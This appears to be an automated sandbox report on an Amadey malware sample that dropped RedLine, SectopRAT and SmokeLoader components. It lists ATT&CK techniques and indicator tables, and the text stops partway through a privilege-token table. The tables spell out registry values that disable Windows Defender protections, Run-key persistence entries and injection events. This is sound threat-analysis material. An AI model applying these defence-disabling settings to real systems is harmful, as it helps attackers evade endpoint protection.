amadey | f8b333c710f1b62bbff3e496f0e7b710b1961c04c378f69615a4e6bb5b189048

Windows Service

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	E3AD.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	E3AD.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	AppLaunch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	E3AD.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	E3AD.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	E3AD.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	E3AD.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 6 IoCs

resource	yara_rule
behavioral2/memory/4612-46-0x0000000000400000-0x000000000043E000-memory.dmp	family_redline
behavioral2/files/0x0006000000023270-340.dat	family_redline
behavioral2/files/0x0006000000023270-341.dat	family_redline
behavioral2/memory/464-350-0x0000000000610000-0x000000000064E000-memory.dmp	family_redline
behavioral2/memory/6056-575-0x00000000007F0000-0x000000000080E000-memory.dmp	family_redline
behavioral2/memory/1504-576-0x0000000002090000-0x00000000020EA000-memory.dmp	family_redline

SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 1 IoCs

resource	yara_rule
behavioral2/memory/6056-575-0x00000000007F0000-0x000000000080E000-memory.dmp	family_sectoprat

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs

description	pid	Process	procid_target
PID 392 created 2636	392	latestX.exe	47
PID 392 created 2636	392	latestX.exe	47
PID 392 created 2636	392	latestX.exe	47
PID 392 created 2636	392	latestX.exe	47
PID 392 created 2636	392	latestX.exe	47
PID 3680 created 2636	3680	updater.exe	47
PID 3680 created 2636	3680	updater.exe	47
PID 3680 created 2636	3680	updater.exe	47
PID 3680 created 2636	3680	updater.exe	47
PID 3680 created 2636	3680	updater.exe	47
PID 3680 created 2636	3680	updater.exe	47

Downloads MZ/PE file

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\drivers\etc\hosts	latestX.exe
File created	C:\Windows\System32\drivers\etc\hosts	updater.exe

Modifies Windows Firewall 1 TTPs 1 IoCs

evasion

Windows Service

pid	Process
5848	netsh.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation	E564.exe
Key value queried	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation	explothe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation	1F22.exe
Key value queried	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation	5NE0QX3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation	DFB3.bat

Executes dropped EXE 38 IoCs

pid	Process
2208	Lu4ua02.exe
3944	mY0Gp03.exe
5028	GQ6tR88.exe
988	1ga19vi8.exe
3664	2Vs6741.exe
2952	3fc11QJ.exe
4020	4df752kv.exe
1348	5NE0QX3.exe
1764	DC37.exe
5716	WM4JB1eP.exe
5748	Qy4Cp1KT.exe
5784	DDFD.exe
5836	HI5pY7wp.exe
4908	iB7uQ5mm.exe
4052	1mG04nt9.exe
5864	DFB3.bat
6044	E293.exe
5556	E3AD.exe
1784	E564.exe
464	2ry631Xj.exe
5412	explothe.exe
2324	1F22.exe
5940	toolspub2.exe
4340	31839b57a4f11171d6abc8bbc4451ee4.exe
6032	source1.exe
392	latestX.exe
5612	toolspub2.exe
1504	3088.exe
1400	32DB.exe
6056	34B0.exe
2460	explothe.exe
5532	31839b57a4f11171d6abc8bbc4451ee4.exe
3680	updater.exe
4144	csrss.exe
4236	injector.exe
5228	explothe.exe
1736	windefender.exe
1996	windefender.exe

Loads dropped DLL 3 IoCs

pid	Process
1504	3088.exe
1504	3088.exe
4140	rundll32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Windows security modification 2 TTPs 1 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	E3AD.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 11 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	file.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	Lu4ua02.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	mY0Gp03.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	DC37.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\""	HI5pY7wp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	csrss.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""	GQ6tR88.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	WM4JB1eP.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""	Qy4Cp1KT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\""	iB7uQ5mm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	31839b57a4f11171d6abc8bbc4451ee4.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Manipulates WinMonFS driver. 1 IoCs

Roottkits write to WinMonFS to hide directories/files from being detected.

rootkit evasion

description	ioc	Process
File opened for modification	\??\WinMonFS	csrss.exe

Drops file in System32 directory 10 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe

Suspicious use of SetThreadContext 11 IoCs

description	pid	Process	procid_target
PID 988 set thread context of 1608	988	1ga19vi8.exe	91
PID 3664 set thread context of 4024	3664	2Vs6741.exe	98
PID 2952 set thread context of 4936	2952	3fc11QJ.exe	106
PID 4020 set thread context of 4612	4020	4df752kv.exe	113
PID 5784 set thread context of 5924	5784	DDFD.exe	155
PID 4052 set thread context of 2204	4052	1mG04nt9.exe	161
PID 6044 set thread context of 4576	6044	E293.exe	168
PID 5940 set thread context of 5612	5940	toolspub2.exe	201
PID 6032 set thread context of 4240	6032	source1.exe	213
PID 3680 set thread context of 1980	3680	updater.exe	287
PID 3680 set thread context of 1200	3680	updater.exe	288

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	31839b57a4f11171d6abc8bbc4451ee4.exe

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Chrome\updater.exe	latestX.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\rss	31839b57a4f11171d6abc8bbc4451ee4.exe
File created	C:\Windows\rss\csrss.exe	31839b57a4f11171d6abc8bbc4451ee4.exe
File created	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\windefender.exe	csrss.exe

Launches sc.exe 11 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2152	sc.exe
5560	sc.exe
1584	sc.exe
2728	sc.exe
4556	sc.exe
5388	sc.exe
5268	sc.exe
5816	sc.exe
1212	sc.exe
452	sc.exe
2128	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 10 IoCs

pid	pid_target	Process	procid_target
3108	988	WerFault.exe	89
4556	3664	WerFault.exe	95
2452	4024	WerFault.exe	98
636	2952	WerFault.exe	105
3056	4020	WerFault.exe	110
1200	5784	WerFault.exe	148
6124	4052	WerFault.exe	150
5256	2204	WerFault.exe	161
408	6044	WerFault.exe	163
5216	1504	WerFault.exe	203

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

pid	Process
3088	schtasks.exe
3356	schtasks.exe
2836	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-2871 = "Magallanes Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-2591 = "Tocantins Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2322 = "Sakhalin Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-251 = "Dateline Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-2371 = "Easter Island Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-3142 = "South Sudan Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2182 = "Astrakhan Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-282 = "Central Europe Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-1932 = "Russia TZ 11 Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-961 = "Paraguay Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2872 = "Magallanes Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-1501 = "Turkey Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2512 = "Lord Howe Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-2531 = "Chatham Islands Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-364 = "Middle East Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-631 = "Tokyo Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-412 = "E. Africa Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1932 = "Russia TZ 11 Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3142 = "South Sudan Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-12 = "Azores Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-1842 = "Russia TZ 4 Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-302 = "Romance Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-1872 = "Russia TZ 7 Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-252 = "Dateline Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-272 = "Greenwich Standard Time"	windefender.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1608	AppLaunch.exe
1608	AppLaunch.exe
4936	AppLaunch.exe
4936	AppLaunch.exe
1496	msedge.exe
1496	msedge.exe
4460	msedge.exe
4460	msedge.exe
4624	msedge.exe
4624	msedge.exe
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2636	Explorer.EXE

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
656	Process not Found

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
4936	AppLaunch.exe
5612	toolspub2.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs

pid	Process
4624	msedge.exe
4624	msedge.exe
4624	msedge.exe
4624	msedge.exe
4624	msedge.exe
4624	msedge.exe
4624	msedge.exe
4624	msedge.exe
4624	msedge.exe
4624	msedge.exe
4624	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1608	AppLaunch.exe
Token: SeShutdownPrivilege	2636	Explorer.EXE
Token: SeCreatePagefilePrivilege	2636	Explorer.EXE
Token: SeShutdownPrivilege	2636	Explorer.EXE
Token: SeCreatePagefilePrivilege	2636	Explorer.EXE
Token: SeShutdownPrivilege	2636	Explorer.EXE
Token: SeCreatePagefilePrivilege	2636	Explorer.EXE
Token: SeShutdownPrivilege	2636	Explorer.EXE
Token: SeCreatePagefilePrivilege	2636	Explorer.EXE
Token: SeDebugPrivilege	5556	E3AD.exe
Token: SeShutdownPrivilege	2636	Explorer.EXE
Token: SeCreatePagefilePrivilege	2636	Explorer.EXE
Token: SeShutdownPrivilege	2636	Explorer.EXE
Token: SeCreatePagefilePrivilege	2636	Explorer.EXE
Token: SeShutdownPrivilege	2636	Explorer.EXE
Token: SeCreatePagefilePrivilege	2636	Explorer.EXE
Token: SeDebugPrivilege	6032	source1.exe
Token: SeShutdownPrivilege	2636	Explorer.EXE
Token: SeCreatePagefilePrivilege	2636	Explorer.EXE
Token: SeShutdownPrivilege	2636	Explorer.EXE
Token: SeCreatePagefilePrivilege	2636	Explorer.EXE
Token: SeShutdownPrivilege	2636	Explorer.EXE
Token: SeCreatePagefilePrivilege	2636	Explorer.EXE
Token: SeShutdownPrivilege	2636	Explorer.EXE
Token: SeCreatePagefilePrivilege	2636	Explorer.EXE
Token: SeShutdownPrivilege	2636	Explorer.EXE
Token: SeCreatePagefilePrivilege	2636	Explorer.EXE
Token: SeShutdownPrivilege	2636	Explorer.EXE
Token: SeCreatePagefilePrivilege	2636	Explorer.EXE
Token: SeShutdownPrivilege	2636	Explorer.EXE
Token: SeCreatePagefilePrivilege	2636	Explorer.EXE
Token: SeShutdownPrivilege	2636	Explorer.EXE
Token: SeCreatePagefilePrivilege	2636	Explorer.EXE
Token: SeShutdownPrivilege	2636	Explorer.EXE
